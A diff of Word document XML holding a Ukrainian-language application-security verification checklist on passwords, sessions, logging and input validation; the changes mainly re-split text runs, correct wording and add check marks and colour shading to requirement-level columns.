+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> шаром даних,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10094,7 +11463,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> означає, що облікові дані зберігаютьс</w:t>
+              <w:t xml:space="preserve"> означа</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>є,</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> що облікові дані зберігаютьс</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10619,7 +12010,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>пароля включає в себе старий пароль, новий пароль і підтвердження пароля.</w:t>
+              <w:t xml:space="preserve">пароля включає в себе старий пароль, новий пароль і </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ідтвердження пароля.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11141,15 +12554,27 @@
               </w:rPr>
               <w:t xml:space="preserve">що </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>немає паролі</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>нема</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>є паролі</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12299,7 +13724,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12463,7 +13910,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що вживаються заходи, щоб заблокувати використання </w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що вживаються заходи, щоб заблокувати використання </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14198,7 +15667,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>якщо такий менеджер є, то він</w:t>
+              <w:t>якщо такий менеджер</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> є,</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> то він</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14390,7 +15881,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14556,7 +16069,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> після певного періоду бездіяльності.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ісля певного періоду бездіяльності.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14722,7 +16257,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> після того, як</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ісля того, як</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15198,7 +16755,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> про помилки або журналах. Це включає в себе перевірку того, що програма не вміє </w:t>
+              <w:t xml:space="preserve"> про помилки або журналах. Це </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>включає в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> себе перевірку того, що програма не вміє </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15562,6 +17141,7 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15642,6 +17222,7 @@
               </w:rPr>
               <w:t>додатком.</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -16361,7 +17942,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, що </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16453,8 +18078,6 @@
               </w:rPr>
               <w:t>ю</w:t>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16470,6 +18093,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16500,11 +18124,22 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16535,11 +18170,22 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16570,6 +18216,16 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -16720,17 +18376,69 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> до відхилення запиту та</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>логується</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>до</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> відхилення запиту та</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>логу</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ванню </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>запиту</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16747,6 +18455,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16777,11 +18486,22 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16812,11 +18532,22 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16847,6 +18578,16 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -16937,17 +18678,69 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що вхідні перевірка підпрограми </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>виконується</w:t>
+              <w:t>Пе</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>реконайтеся, що вхідні перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>и</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ідпрограм</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> виконуються</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16964,6 +18757,65 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1529"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16991,14 +18843,24 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17029,11 +18891,74 @@
